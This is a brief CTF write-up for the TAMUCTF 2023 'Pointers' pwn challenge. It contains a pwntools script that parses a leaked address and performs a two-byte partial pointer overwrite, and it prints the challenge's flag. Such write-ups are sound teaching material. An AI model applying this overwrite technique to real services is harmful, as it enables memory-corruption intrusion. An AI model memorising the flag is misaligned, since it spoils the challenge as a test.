Pointers

05/04/2023

By: unvariant

Tags: pwn TAMUCTF-2023

Problem Description:

I've been messing with pointers lately which never goes wrong, right?

Hints:

None

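Solve script:
from pwn import *

# Connect to the challenge service over TLS, selecting it by SNI
p = remote("tamuctf.com", 443, ssl=True, sni="pointers")

# The service prints an address after "being stored at "; parse it as hex
p.recvuntil(b"being stored at ")
leak = int(p.recvline(), 16)
print(f"leak: {leak:x}")

# Target address is 0x28 bytes past the leaked address
target = leak + 0x20 + 0x08

# 8 bytes of filler, then only the low 16 bits of target (little-endian),
# so just two bytes past the filler are written
p.send(b"A" * 8 + p16(target & 0xFFFF))

p.interactive()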

Flag: gigem{small_overflows_are_still_effective}